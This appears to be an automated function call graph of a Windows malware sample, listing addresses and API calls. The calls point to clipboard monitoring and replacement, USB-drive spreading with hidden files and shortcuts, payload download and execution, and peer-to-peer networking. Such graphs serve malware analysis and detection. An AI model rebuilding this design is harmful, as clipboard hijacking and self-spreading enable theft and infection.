40c535 4914->4915 4916 40c53b SysFreeString 4914->4916 4915->4916 4916->4912 4920 40b07d 4917->4920 4918 40b098 SysFreeString 4918->4773 4919 408880 9 API calls 4919->4920 4920->4918 4920->4919 4921 40b020 _vscprintf wvsprintfA 4920->4921 4921->4920 4923 40924c socket 4922->4923 4924 409239 gethostbyname 4922->4924 4923->4779 4923->4783 4924->4923 4925->4783 4926->4786 4928 40ccb1 4927->4928 4929 40cb24 InternetConnectA 4927->4929 4928->4792 4928->4793 4930 40cca4 InternetCloseHandle 4929->4930 4931 40cb5d HttpOpenRequestA 4929->4931 4930->4928 4932 40cb93 HttpAddRequestHeadersA HttpSendRequestA 4931->4932 4933 40cc97 InternetCloseHandle 4931->4933 4934 40cc8a InternetCloseHandle 4932->4934 4937 40cbdd 4932->4937 4933->4930 4934->4933 4935 40cbf4 InternetReadFile 4936 40cc21 4935->4936 4935->4937 4936->4934 4937->4935 4937->4936 4938 408880 9 API calls 4937->4938 4939 40cc3c memcpy 4938->4939 4939->4937 4946 405677 4940->4946 4941 4055f0 CoCreateInstance 4941->4946 4942 40584b 4944 405854 SysFreeString 4942->4944 4945 40585e SysFreeString 4942->4945 4943 408990 __aligned_recalloc_base 3 API calls 4943->4942 4944->4945 4945->4330 4946->4941 4947 4057c6 SysAllocString 4946->4947 4948 405692 4946->4948 4947->4946 4947->4948 4948->4942 4948->4943 4950 40a5da 4949->4950 4951 40a5de 4949->4951 4950->4336 4953 40a590 CryptAcquireContextW 4951->4953 4954 40a5cb 4953->4954 4955 40a5ad CryptGenRandom CryptReleaseContext 4953->4955 4954->4950 4955->4954 4956->4362 4996 409490 gethostname 4957->4996 4961 40977c strstr 4962 40978c 4961->4962 4963 4097cd 4961->4963 5000 409200 inet_ntoa 4962->5000 5002 409200 inet_ntoa 4963->5002 4966 40979a strstr 4968 4097aa 4966->4968 4976 409769 4966->4976 4967 4097db strstr 4969 4097eb 4967->4969 4970 40982c EnterCriticalSection 4967->4970 5001 409200 inet_ntoa 4968->5001 5003 409200 inet_ntoa 4969->5003 4975 409844 4970->4975 4973 4097b8 strstr 4973->4963 4973->4976 4974 4097f9 strstr 4974->4976 4977 409809 4974->4977 4982 40986f 4975->4982 5005 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4975->5005 4976->4362 5004 409200 inet_ntoa 4977->5004 4980 409968 LeaveCriticalSection 4980->4976 4981 409817 strstr 4981->4970 4981->4976 4982->4980 4983 408820 7 API calls 4982->4983 4984 4098b3 4983->4984 4984->4980 5006 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 4984->5006 4986 4098d1 4987 4098f3 Sleep 4986->4987 4988 4098fd 4986->4988 4990 409923 4986->4990 4987->4986 4989 408990 __aligned_recalloc_base 3 API calls 4988->4989 4989->4990 4990->4980 5007 409380 4990->5007 4992->4364 4994 409380 14 API calls 4993->4994 4995 409483 LeaveCriticalSection 4994->4995 4995->4358 4997 4094b7 gethostbyname 4996->4997 4998 4094d3 4996->4998 4997->4998 4998->4976 4999 409200 inet_ntoa 4998->4999 4999->4961 5000->4966 5001->4973 5002->4967 5003->4974 5004->4981 5005->4982 5006->4986 5008 409394 5007->5008 5015 40938f 5007->5015 5009 408840 __aligned_recalloc_base 7 API calls 5008->5009 5010 4093a8 5009->5010 5011 409404 CreateFileW 5010->5011 5010->5015 5012 409453 InterlockedExchange 5011->5012 5013 409427 WriteFile FlushFileBuffers CloseHandle 5011->5013 5014 408990 __aligned_recalloc_base 3 API calls 5012->5014 5013->5012 5014->5015 5015->4980 5020 40b84d 5016->5020 5017 40b8b1 5017->4371 5017->4372 5018 40b871 WaitForSingleObject 5019 40b88c CloseHandle 5018->5019 5018->5020 5019->5020 5020->5017 5020->5018 5025 409340 5026 409343 WaitForSingleObject 5025->5026 5027 409371 5026->5027 5028 40935b InterlockedDecrement 5026->5028 5029 40936a 5028->5029 5029->5026 5030 409470 16 API calls 5029->5030 5030->5029 5031 40b5c0 5032 40b5c4 5031->5032 5034 40b5e0 WaitForSingleObject 5032->5034 5035 40b605 5032->5035 5037 4099a0 EnterCriticalSection 5032->5037 5042 40b420 InterlockedExchangeAdd 5032->5042 5034->5032 5034->5035 5038 4099d7 LeaveCriticalSection 5037->5038 5039 4099bf 5037->5039 5038->5032 5040 40a5d0 3 API calls 5039->5040 5041 4099ca 5040->5041 5041->5038 5043 40b43d 5042->5043 5053 40b436 5042->5053 5059 40b330 5043->5059 5046 40b45d InterlockedIncrement 5055 40b467 5046->5055 5048 40b490 5069 409200 inet_ntoa 5048->5069 5050 40b49c 5051 40b560 InterlockedDecrement 5050->5051 5083 409320 shutdown closesocket 5051->5083 5053->5032 5054 408840 __aligned_recalloc_base 7 API calls 5054->5055 5055->5048 5055->5051 5055->5054 5056 40b260 6 API calls 5055->5056 5058 408990 __aligned_recalloc_base 3 API calls 5055->5058 5066 409dd0 5055->5066 5070 409f30 5055->5070 5056->5055 5058->5055 5060 40b33d socket 5059->5060 5061 40b352 htons connect 5060->5061 5062 40b3af 5060->5062 5061->5062 5063 40b39a 5061->5063 5062->5060 5065 40b3a3 5062->5065 5084 409320 shutdown closesocket 5063->5084 5065->5046 5065->5053 5085 409be0 5066->5085 5069->5050 5080 409f41 5070->5080 5072 408990 __aligned_recalloc_base 3 API calls 5073 40a2c4 5072->5073 5073->5055 5074 409c80 20 API calls 5074->5080 5075 409f5f 5075->5072 5078 409dd0 13 API calls 5078->5080 5079 409980 28 API calls 5079->5080 5080->5074 5080->5075 5080->5078 5080->5079 5093 4099f0 EnterCriticalSection 5080->5093 5098 405550 5080->5098 5103 405590 5080->5103 5108 405460 5080->5108 5115 4054c0 5080->5115 5083->5053 5084->5065 5086 40a610 3 API calls 5085->5086 5087 409beb 5086->5087 5088 409c07 lstrlenA 5087->5088 5089 40a8a0 7 API calls 5088->5089 5090 409c3d 5089->5090 5091 409c68 5090->5091 5092 408990 __aligned_recalloc_base 3 API calls 5090->5092 5091->5055 5092->5091 5094 409a08 5093->5094 5095 409a44 LeaveCriticalSection 5094->5095 5118 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5094->5118 5095->5080 5097 409a33 5097->5095 5119 4054f0 5098->5119 5101 405589 5101->5080 5102 40b8c0 17 API calls 5102->5101 5104 4054f0 65 API calls 5103->5104 5105 4055af 5104->5105 5106 4055dc 5105->5106 5129 405410 5105->5129 5106->5080 5132 4045e0 EnterCriticalSection 5108->5132 5110 40547a 5111 4054ad 5110->5111 5137 405370 5110->5137 5111->5080 5114 408990 __aligned_recalloc_base 3 API calls 5114->5111 5144 4046a0 EnterCriticalSection 5115->5144 5117 4054e2 5117->5080 5118->5097 5122 405503 5119->5122 5120 405540 5120->5101 5120->5102 5122->5120 5123 4044f0 EnterCriticalSection 5122->5123 5124 40af30 63 API calls 5123->5124 5127 404510 5124->5127 5125 4045be LeaveCriticalSection 5125->5122 5126 408990 __aligned_recalloc_base 3 API calls 5128 4045bb 5126->5128 5127->5125 5127->5126 5128->5125 5130 409be0 13 API calls 5129->5130 5131 405455 5130->5131 5131->5106 5133 4045fe 5132->5133 5134 40468a LeaveCriticalSection 5133->5134 5135 408a00 8 API calls 5133->5135 5134->5110 5136 40465c 5135->5136 5136->5134 5138 408840 __aligned_recalloc_base 7 API calls 5137->5138 5139 405382 memcpy 5138->5139 5140 409be0 13 API calls 5139->5140 5141 4053ec 5140->5141 5142 408990 __aligned_recalloc_base 3 API calls 5141->5142 5143 4053fb 5142->5143 5143->5114 5168 40af90 5144->5168 5147 4048de LeaveCriticalSection 5147->5117 5148 40af30 63 API calls 5149 4046db 5148->5149 5149->5147 5152 408990 __aligned_recalloc_base 3 API calls 5149->5152 5167 4047f3 5149->5167 5150 404210 15 API calls 5155 40481c 5150->5155 5151 408990 __aligned_recalloc_base 3 API calls 5153 40483d 5151->5153 5154 404752 5152->5154 5153->5147 5156 40484c CreateFileW 5153->5156 5157 408a00 8 API calls 5154->5157 5155->5151 5156->5147 5158 40486f 5156->5158 5159 404762 5157->5159 5162 4048ca FlushFileBuffers CloseHandle 5158->5162 5163 40488c WriteFile 5158->5163 5160 408990 __aligned_recalloc_base 3 API calls 5159->5160 5161 404789 5160->5161 5164 40a8a0 7 API calls 5161->5164 5162->5147 5163->5158 5165 4047c0 5164->5165 5166 4059c0 10 API calls 5165->5166 5166->5167 5167->5150 5167->5155 5171 40a4e0 5168->5171 5176 40a4f3 5171->5176 5172 408a00 8 API calls 5172->5176 5173 40a50d 5175 408990 __aligned_recalloc_base 3 API calls 5173->5175 5174 40a440 62 API calls 5174->5176 5177 4046c4 5175->5177 5176->5172 5176->5173 5176->5174 5178 406300 61 API calls 5176->5178 5177->5147 5177->5148 5178->5176 5179 40b7c0 5185 40e9b0 5179->5185 5182 40b800 5183 40b7e7 WaitForSingleObject 5189 40de00 5183->5189 5186 40e9b7 5185->5186 5188 40b7d6 5185->5188 5186->5188 5210 40e820 5186->5210 5188->5182 5188->5183 5190 40df32 5189->5190 5191 40de08 5189->5191 5190->5182 5191->5190 5192 40de14 EnterCriticalSection 5191->5192 5193 40deb0 LeaveCriticalSection SetEvent 5192->5193 5194 40de2b 5192->5194 5195 40dee3 5193->5195 5196 40decb 5193->5196 5194->5193 5197 40de3c InterlockedDecrement 5194->5197 5200 40de55 InterlockedExchangeAdd 5194->5200 5208 40de9b InterlockedDecrement 5194->5208 5237 40b9b0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5195->5237 5198 40ded1 PostQueuedCompletionStatus 5196->5198 5197->5194 5198->5195 5198->5198 5200->5194 5203 40de68 InterlockedIncrement 5200->5203 5201 40deee 5246 40baf0 5201->5246 5231 40e450 WSARecv 5203->5231 5207 40df1f DeleteCriticalSection 5209 408990 __aligned_recalloc_base 3 API calls 5207->5209 5208->5194 5209->5190 5211 408820 7 API calls 5210->5211 5212 40e82b 5211->5212 5213 40e9a4 5212->5213 5214 40e838 GetSystemInfo InitializeCriticalSection CreateEventA 5212->5214 5213->5188 5215 40e876 CreateIoCompletionPort 5214->5215 5216 40e99f 5214->5216 5215->5216 5217 40e88f 5215->5217 5218 40de00 36 API calls 5216->5218 5219 40b810 8 API calls 5217->5219 5218->5213 5220 40e894 5219->5220 5220->5216 5221 40e89f WSASocketA 5220->5221 5221->5216 5222 40e8bd setsockopt htons bind 5221->5222 5222->5216 5223 40e926 listen 5222->5223 5223->5216 5224 40e93a WSACreateEvent 5223->5224 5224->5216 5225 40e947 WSAEventSelect 5224->5225 5225->5216 5226 40e959 5225->5226 5227 40e97f 5226->5227 5228 40b8c0 17 API calls 5226->5228 5229 40b8c0 17 API calls 5227->5229 5228->5226 5230 40e994 5229->5230 5230->5188 5232 40e4d2 5231->5232 5234 40e48e 5231->5234 5232->5194 5233 40e490 WSAGetLastError 5233->5232 5233->5234 5234->5233 5235 40e4a4 Sleep WSARecv 5234->5235 5236 40e4db 5234->5236 5235->5232 5235->5233 5236->5194 5238 40b9e6 InterlockedExchangeAdd 5237->5238 5239 40bac9 GetCurrentThread SetThreadPriority 5237->5239 5238->5239 5244 40ba00 5238->5244 5239->5201 5240 40ba19 EnterCriticalSection 5240->5244 5241 40ba87 LeaveCriticalSection 5243 40ba9e 5241->5243 5241->5244 5242 40ba63 WaitForSingleObject 5242->5244 5243->5239 5244->5239 5244->5240 5244->5241 5244->5242 5244->5243 5245 40babc Sleep 5244->5245 5245->5244 5247 40bafc EnterCriticalSection 5246->5247 5254 40bb72 CloseHandle CloseHandle WSACloseEvent 5246->5254 5248 40bb18 5247->5248 5249 40bb40 LeaveCriticalSection DeleteCriticalSection 5248->5249 5250 40bb2b CloseHandle 5248->5250 5251 408990 __aligned_recalloc_base 3 API calls 5249->5251 5250->5248 5252 40bb66 5251->5252 5253 408990 __aligned_recalloc_base 3 API calls 5252->5253 5253->5254 5255 409320 shutdown closesocket 5254->5255 5255->5207 5661 40b200 5666 40b1a0 5661->5666 5664 40b1a0 send 5665 40b22e 5664->5665 5667 40b1b1 send 5666->5667 5668 40b1e5 5667->5668 5669 40b1ce 5667->5669 5668->5664 5668->5665 5669->5667 5669->5668 5670 40b580 5671 409610 4 API calls 5670->5671 5672 40b593 5671->5672 5673 40b5aa 5672->5673 5674 40b420 131 API calls 5672->5674 5674->5673 5268 405045 5271 404feb 5268->5271 5269 40501b lstrcmpiW 5269->5271 5270 405196 FindNextFileW 5272 4051b2 FindClose 5270->5272 5273 404fbf lstrcmpW 5270->5273 5271->5269 5271->5270 5274 405082 PathMatchSpecW 5271->5274 5275 405100 PathFileExistsW 5271->5275 5282 404bb0 CreateDirectoryW wsprintfW FindFirstFileW 5271->5282 5279 4051bf 5272->5279 5273->5271 5276 404fd5 lstrcmpW 5273->5276 5274->5271 5277 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5274->5277 5275->5271 5278 405116 wsprintfW wsprintfW 5275->5278 5276->5271 5277->5271 5278->5271 5280 405180 MoveFileExW 5278->5280 5280->5270 5283 404c05 lstrcmpW 5282->5283 5284 404cdf 5282->5284 5285 404c1b lstrcmpW 5283->5285 5290 404c31 5283->5290 5284->5271 5287 404c33 wsprintfW wsprintfW 5285->5287 5285->5290 5286 404cac FindNextFileW 5286->5283 5289 404cc8 FindClose RemoveDirectoryW 5286->5289 5288 404c96 MoveFileExW 5287->5288 5287->5290 5288->5286 5289->5284 5290->5286 5675 404685 5677 4045fe 5675->5677 5676 40468a LeaveCriticalSection 5677->5676 5678 408a00 8 API calls 5677->5678 5679 40465c 5678->5679 5679->5676 5680 409e87 5681 409efe 5680->5681 5682 409f0f 5681->5682 5683 408990 __aligned_recalloc_base 3 API calls 5681->5683 5683->5682 5684 40ea08 5685 40ea10 5684->5685 5687 40eac4 5685->5687 5690 40ec4d 5685->5690 5689 40ea49 5689->5687 5694 40eb38 RtlUnwind 5689->5694 5691 40ec62 5690->5691 5693 40ec7e 5690->5693 5692 40eced NtQueryVirtualMemory 5691->5692 5691->5693 5692->5693 5693->5689 5695 40eb50 5694->5695 5695->5689 5295 403ed0 GetWindowLongW 5296 403ef4 5295->5296 5297 403f16 5295->5297 5298 403f01 5296->5298 5299 403f87 IsClipboardFormatAvailable 5296->5299 5300 403f66 5297->5300 5301 403f4e SetWindowLongW 5297->5301 5314 403f11 5297->5314 5304 403f24 SetClipboardViewer SetWindowLongW 5298->5304 5305 403f07 5298->5305 5302 403fa3 IsClipboardFormatAvailable 5299->5302 5303 403f9a 5299->5303 5307 403f6c SendMessageA 5300->5307 5300->5314 5301->5314 5302->5303 5308 403fb8 IsClipboardFormatAvailable 5302->5308 5310 403fd5 OpenClipboard 5303->5310 5329 40409c 5303->5329 5306 404104 DefWindowProcA 5304->5306 5309 4040bd RegisterRawInputDevices ChangeClipboardChain 5305->5309 5305->5314 5307->5314 5308->5303 5309->5306 5312 403fe5 GetClipboardData 5310->5312 5310->5329 5311 4040a5 SendMessageA 5311->5314 5313 403ffd GlobalLock 5312->5313 5312->5314 5313->5314 5315 404015 5313->5315 5314->5306 5316 404028 5315->5316 5317 404049 5315->5317 5318 40405e 5316->5318 5319 40402e 5316->5319 5320 403ce0 13 API calls 5317->5320 5336 403e00 5318->5336 5321 404034 GlobalUnlock CloseClipboard 5319->5321 5330 403c20 5319->5330 5320->5321 5325 404087 5321->5325 5321->5329 5344 403480 lstrlenW 5325->5344 5328 408990 __aligned_recalloc_base 3 API calls 5328->5329 5329->5311 5329->5314 5331 403c2b 5330->5331 5332 403c31 lstrlenW 5331->5332 5333 403c44 5331->5333 5334 408840 __aligned_recalloc_base 7 API calls 5331->5334 5335 403c61 lstrcpynW 5331->5335 5332->5331 5332->5333 5333->5321 5334->5331 5335->5331 5335->5333 5341 403e0d 5336->5341 5337 403e13 lstrlenA 5337->5341 5342 403e26 5337->5342 5338 403bc0 2 API calls 5338->5341 5339 408840 __aligned_recalloc_base 7 API calls 5339->5341 5341->5337 5341->5338 5341->5339 5341->5342 5343 408990 __aligned_recalloc_base 3 API calls 5341->5343 5373 403db0 5341->5373 5342->5321 5343->5341 5345 4034b0 5344->5345 5346 403698 StrStrW 5345->5346 5348 40363a 5345->5348 5369 403628 5345->5369 5346->5348 5349 4036c3 StrStrW 5346->5349 5347 403756 StrStrW 5351 40376d 5347->5351 5354 403800 StrStrW 5347->5354 5348->5347 5348->5369 5349->5348 5350 4036eb StrStrW 5349->5350 5350->5348 5352 4037c6 isalpha 5351->5352 5351->5354 5351->5369 5352->5351 5353 4037dd isdigit 5352->5353 5353->5351 5353->5369 5356 4039e7 5354->5356 5357 4039ee StrStrW 5354->5357 5356->5357 5358 403a01 StrStrW 5357->5358 5360 403a3f 5358->5360 5361 403aa2 StrStrW 5360->5361 5367 403ae9 lstrlenA 5360->5367 5362 403ab5 5361->5362 5363 403abc StrStrW 5361->5363 5362->5363 5364 403ad6 StrStrW 5363->5364 5365 403acf 5363->5365 5364->5367 5365->5364 5368 403b39 GlobalAlloc 5367->5368 5367->5369 5368->5369 5370 403b54 GlobalLock 5368->5370 5369->5328 5370->5369 5371 403b67 memcpy GlobalUnlock OpenClipboard 5370->5371 5371->5369 5372 403b94 EmptyClipboard SetClipboardData CloseClipboard 5371->5372 5372->5369 5374 403dbb 5373->5374 5375 403dc1 lstrlenA 5374->5375 5376 403bc0 2 API calls 5374->5376 5377 403df4 5374->5377 5375->5374 5376->5374 5377->5341 5378 40bcd0 5384 40d5c0 5378->5384 5380 40bce7 5381 40bd11 5380->5381 5382 40bcf8 WaitForSingleObject 5380->5382 5397 40da20 5382->5397 5385 40d5ce 5384->5385 5391 40d6ae 5384->5391 5386 408820 7 API calls 5385->5386 5385->5391 5387 40d5de CreateEventA socket 5386->5387 5388 40d615 5387->5388 5389 40d61a 5387->5389 5392 40da20 8 API calls 5388->5392 5390 40d624 htons setsockopt bind 5389->5390 5389->5391 5393 40d694 CreateThread 5390->5393 5394 40d688 5390->5394 5391->5380 5392->5389 5393->5391 5395 40da20 8 API calls 5394->5395 5396 40d68d 5395->5396 5396->5380 5398 40da24 5397->5398 5405 40da80 5397->5405 5399 40da2c SetEvent WaitForSingleObject CloseHandle 5398->5399 5398->5405 5403 40da54 5399->5403 5406 40da70 5399->5406 5401 408990 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5401->5403 5402 40da7a 5404 408990 __aligned_recalloc_base 3 API calls 5402->5404 5403->5401 5403->5406 5404->5405 5405->5381 5407 409320 shutdown closesocket 5406->5407 5407->5402 5408 40e750 GetQueuedCompletionStatus 5409 40e792 5408->5409 5414 40e808 5408->5414 5410 40e797 WSAGetOverlappedResult 5409->5410 5415 40e560 5409->5415 5410->5409 5412 40e7b9 WSAGetLastError 5410->5412 5412->5409 5413 40e7d3 GetQueuedCompletionStatus 5413->5409 5413->5414 5416 40e6f2 InterlockedDecrement setsockopt closesocket 5415->5416 5417 40e574 5415->5417 5418 40e639 5416->5418 5417->5416 5419 40e57c 5417->5419 5418->5413 5435 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5419->5435 5421 40e581 InterlockedExchange 5422 40e598 5421->5422 5423 40e64e 5421->5423 5422->5418 5426 40e5a9 InterlockedDecrement 5422->5426 5427 40e5bc InterlockedDecrement InterlockedExchangeAdd 5422->5427 5424 40e667 5423->5424 5425 40e657 InterlockedDecrement 5423->5425 5428 40e672 5424->5428 5429 40e687 InterlockedDecrement 5424->5429 5425->5413 5426->5413 5431 40e62f 5427->5431 5444 40e2e0 WSASend 5428->5444 5430 40e6e9 5429->5430 5430->5413 5436 40e4f0 5431->5436 5433 40e67e 5433->5413 5435->5421 5437 40e500 InterlockedExchangeAdd 5436->5437 5438 40e4fc 5436->5438 5439 40e553 5437->5439 5440 40e517 InterlockedIncrement 5437->5440 5438->5418 5439->5418 5441 40e450 4 API calls 5440->5441 5442 40e546 5441->5442 5442->5439 5443 40e54c InterlockedDecrement 5442->5443 5443->5439 5445 40e350 5444->5445 5446 40e312 WSAGetLastError 5444->5446 5445->5433 5446->5445 5447 40e31f 5446->5447 5448 40e356 5447->5448 5449 40e326 Sleep WSASend 5447->5449 5448->5433 5449->5445 5449->5446 5450 4051d0 Sleep GetModuleFileNameW 5464 40cea0 CreateFileW 5450->5464 5452 405358 ExitThread 5454 405200 5454->5452 5455 405348 Sleep 5454->5455 5456 405239 5454->5456 5467 4049e0 GetLogicalDrives 5454->5467 5455->5454 5473 404980 5456->5473 5459 405270 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5460 4052e6 wsprintfW 5459->5460 5461 4052fb wsprintfW 5459->5461 5460->5461 5479 404cf0 _chkstk 5461->5479 5463 40526b 5465 40cee8 5464->5465 5466 40cecf GetFileSize CloseHandle 5464->5466 5465->5454 5466->5465 5472 404a0d 5467->5472 5468 404a86 5468->5454 5469 404a1c RegOpenKeyExW 5470 404a3e RegQueryValueExW 5469->5470 5469->5472 5471 404a7a RegCloseKey 5470->5471 5470->5472 5471->5472 5472->5468 5472->5469 5472->5471 5474 4049d9 5473->5474 5475 40499c 5473->5475 5474->5459 5474->5463 5514 404900 GetDriveTypeW 5475->5514 5478 4049cb lstrcpyW 5478->5474 5480 404d0e 6 API calls 5479->5480 5496 404d07 5479->5496 5481 404dc2 5480->5481 5482 404e04 PathFileExistsW 5480->5482 5483 40cea0 3 API calls 5481->5483 5484 404e80 PathFileExistsW 5482->5484 5485 404e15 PathFileExistsW 5482->5485 5490 404dce 5483->5490 5488 404e91 5484->5488 5489 404ed6 FindFirstFileW 5484->5489 5486 404e26 CreateDirectoryW 5485->5486 5487 404e48 PathFileExistsW 5485->5487 5486->5487 5491 404e39 SetFileAttributesW 5486->5491 5487->5484 5492 404e59 CopyFileW 5487->5492 5493 404eb1 5488->5493 5494 404e99 5488->5494 5489->5496 5512 404efd 5489->5512 5490->5482 5495 404de5 SetFileAttributesW DeleteFileW 5490->5495 5491->5487 5492->5484 5498 404e71 SetFileAttributesW 5492->5498 5500 404aa0 3 API calls 5493->5500 5519 404aa0 CoInitialize CoCreateInstance 5494->5519 5495->5482 5496->5463 5497 404fbf lstrcmpW 5501 404fd5 lstrcmpW 5497->5501 5497->5512 5498->5484 5502 404eac SetFileAttributesW 5500->5502 5501->5512 5502->5489 5503 405196 FindNextFileW 5503->5497 5505 4051b2 FindClose 5503->5505 5505->5496 5506 40501b lstrcmpiW 5506->5512 5507 405082 PathMatchSpecW 5509 4050a3 wsprintfW SetFileAttributesW DeleteFileW 5507->5509 5507->5512 5508 405100 PathFileExistsW 5510 405116 wsprintfW wsprintfW 5508->5510 5508->5512 5509->5512 5511 405180 MoveFileExW 5510->5511 5510->5512 5511->5503 5512->5497 5512->5503 5512->5506 5512->5507 5512->5508 5513 404bb0 11 API calls 5512->5513 5513->5512 5515 40493a 5514->5515 5516 404928 5514->5516 5515->5474 5515->5478 5516->5515 5517 40493c QueryDosDeviceW 5516->5517 5517->5515 5518 404956 StrCmpNW 5517->5518 5518->5515 5520 404ad6 5519->5520 5522 404b12 5519->5522 5521 404ae0 wsprintfW 5520->5521 5520->5522 5521->5522 5522->5502 5696 40b610 5701 40e360 5696->5701 5698 40b625 5699 40b643 5698->5699 5700 40e360 16 API calls 5698->5700 5700->5699 5702 40e370 5701->5702 5720 40e43b 5701->5720 5703 408820 7 API calls 5702->5703 5702->5720 5704 40e398 5703->5704 5705 408a00 8 API calls 5704->5705 5704->5720 5706 40e3c4 5705->5706 5707 40e3e0 5706->5707 5708 40e3d1 5706->5708 5710 40e2e0 4 API calls 5707->5710 5709 408990 __aligned_recalloc_base 3 API calls 5708->5709 5711 40e3d7 5709->5711 5712 40e3ed 5710->5712 5711->5698 5713 40e3f6 EnterCriticalSection 5712->5713 5714 40e42c 5712->5714 5716 40e419 LeaveCriticalSection 5713->5716 5717 40e40d 5713->5717 5715 408990 __aligned_recalloc_base 3 API calls 5714->5715 5718 40e435 5715->5718 5716->5698 5717->5716 5719 408990 __aligned_recalloc_base 3 API calls 5718->5719 5719->5720 5720->5698 5721 40ea10 5722 40ea2e 5721->5722 5724 40eac4 5721->5724 5723 40ec4d NtQueryVirtualMemory 5722->5723 5726 40ea49 5723->5726 5725 40eb38 RtlUnwind 5725->5726 5726->5724 5726->5725 5727 40dc10 5728 40dca0 5727->5728 5729 40dc27 5727->5729 5730 40dc37 5729->5730 5731 40dc55 EnterCriticalSection 5729->5731 5732 40dc8c LeaveCriticalSection DeleteCriticalSection 5731->5732 5735 40dc6d 5731->5735 5733 408990 __aligned_recalloc_base 3 API calls 5732->5733 5733->5728 5734 408990 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5734->5735 5735->5734 5736 40dc8b 5735->5736 5736->5732 5523 406359 5524 406362 5523->5524 5525 406371 34 API calls 5524->5525 5526 4071a6 5524->5526 5737 40d79f 5738 40d760 5737->5738 5739 40d7cb memmove 5738->5739 5740 40d7de 5738->5740 5739->5738 5531 40bbe0 5532 409f30 117 API calls 5531->5532 5533 40bc18 5532->5533 5741 405a20 5742 405a7f Sleep 5741->5742 5746 405a96 5742->5746 5743 405b16 Sleep 5743->5742 5744 405aae Sleep wsprintfA 5748 40d160 InternetOpenA 5744->5748 5746->5743 5746->5744 5755 40d210 GetTickCount srand ExpandEnvironmentStringsW 5746->5755 5749 40d186 InternetOpenUrlA 5748->5749 5750 40d1f8 Sleep 5748->5750 5751 40d1a5 HttpQueryInfoA 5749->5751 5752 40d1ee InternetCloseHandle 5749->5752 5750->5746 5753 40d1e4 InternetCloseHandle 5751->5753 5754 40d1ce 5751->5754 5752->5750 5753->5752 5754->5753 5756 40d25e 5755->5756 5756->5756 5757 40d27c mbstowcs rand rand wsprintfW InternetOpenW 5756->5757 5758 40d480 InternetCloseHandle Sleep 5757->5758 5759 40d315 InternetOpenUrlW 5757->5759 5762 40d5a5 5758->5762 5763 40d4a7 6 API calls 5758->5763 5760 40d473 InternetCloseHandle 5759->5760 5761 40d344 CreateFileW 5759->5761 5760->5758 5764 40d373 InternetReadFile 5761->5764 5765 40d466 CloseHandle 5761->5765 5762->5746 5763->5762 5766 40d529 wsprintfW DeleteFileW Sleep 5763->5766 5767 40d3c6 CloseHandle wsprintfW DeleteFileW Sleep 5764->5767 5768 40d397 5764->5768 5765->5760 5769 40cef0 20 API calls 5766->5769 5785 40cef0 CreateFileW 5767->5785 5768->5767 5770 40d3a0 WriteFile 5768->5770 5772 40d569 5769->5772 5770->5764 5774 40d573 Sleep 5772->5774 5775 40d5a7 DeleteFileW 5772->5775 5778 40d0b0 5 API calls 5774->5778 5775->5762 5776 40d459 DeleteFileW 5776->5765 5777 40d41d Sleep 5779 40d0b0 5 API calls 5777->5779 5780 40d58a 5778->5780 5781 40d434 5779->5781 5780->5762 5782 40d59d ExitProcess 5780->5782 5783 40d450 5781->5783 5784 40d448 ExitProcess 5781->5784 5783->5765 5786 40d043 5785->5786 5787 40cf37 CreateFileMappingW 5785->5787 5790 40d049 CreateFileW 5786->5790 5799 40d09a 5786->5799 5788 40cf58 MapViewOfFile 5787->5788 5789 40d039 CloseHandle 5787->5789 5791 40cf77 GetFileSize 5788->5791 5792 40d02f CloseHandle 5788->5792 5789->5786 5793 40d091 5790->5793 5794 40d06b WriteFile CloseHandle 5790->5794 5795 40cf93 5791->5795 5796 40d025 UnmapViewOfFile 5791->5796 5792->5789 5797 408990 __aligned_recalloc_base 3 API calls 5793->5797 5794->5793 5805 40af00 5795->5805 5796->5792 5797->5799 5799->5776 5799->5777 5801 40a8a0 7 API calls 5802 40cfde 5801->5802 5802->5796 5803 408990 __aligned_recalloc_base 3 API calls 5802->5803 5804 40d01b 5803->5804 5804->5796 5806 40a990 10 API calls 5805->5806 5807 40af24 5806->5807 5807->5796 5807->5801 5808 404120 5809 404129 memset GetModuleHandleW 5808->5809 5810 404162 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5809->5810 5810->5810 5811 4041a0 CreateWindowExW 5810->5811 5812 4041cb 5811->5812 5813 4041cd GetMessageA 5811->5813 5814 4041ff ExitThread 5812->5814 5815 4041e1 TranslateMessage DispatchMessageA 5813->5815 5816 4041f7 5813->5816 5815->5813 5816->5809 5816->5814 5817 405920 5818 405987 5817->5818 5823 405931 5817->5823 5821 40d210 60 API calls 5818->5821 5824 405985 5818->5824 5819 408990 __aligned_recalloc_base 3 API calls 5822 4059b2 5819->5822 5820 405940 StrChrA 5820->5823 5821->5824 5823->5820 5823->5824 5825 40d210 60 API calls 5823->5825 5824->5819 5826 40596f Sleep 5825->5826 5826->5823 5827 40e120 GetTickCount WaitForSingleObject 5828 40e2c9 5827->5828 5829 40e14d WSAWaitForMultipleEvents 5827->5829 5830 40e1f0 GetTickCount 5829->5830 5831 40e16a WSAEnumNetworkEvents 5829->5831 5832 40e243 GetTickCount 5830->5832 5833 40e205 EnterCriticalSection 5830->5833 5831->5830 5847 40e183 5831->5847 5835 40e2b5 WaitForSingleObject 5832->5835 5836 40e24e EnterCriticalSection 5832->5836 5834 40e23a LeaveCriticalSection 5833->5834 5837 40e216 5833->5837 5834->5835 5835->5828 5835->5829 5839 40e2a1 LeaveCriticalSection GetTickCount 5836->5839 5840 40e25f InterlockedExchangeAdd 5836->5840 5841 40e229 LeaveCriticalSection 5837->5841 5869 40e020 5837->5869 5838 40e192 accept 5838->5830 5838->5847 5839->5835 5879 40bb80 NtQuerySystemTime RtlTimeToSecondsSince1980 5840->5879 5841->5835 5845 40e272 5845->5839 5845->5840 5880 409320 shutdown closesocket 5845->5880 5847->5830 5847->5838 5848 40e4f0 7 API calls 5847->5848 5849 40dcb0 5847->5849 5848->5830 5850 40dcc2 EnterCriticalSection 5849->5850 5851 40dcbd 5849->5851 5852 40dcd7 5850->5852 5853 40dced LeaveCriticalSection 5850->5853 5851->5847 5852->5853 5854 40dcf8 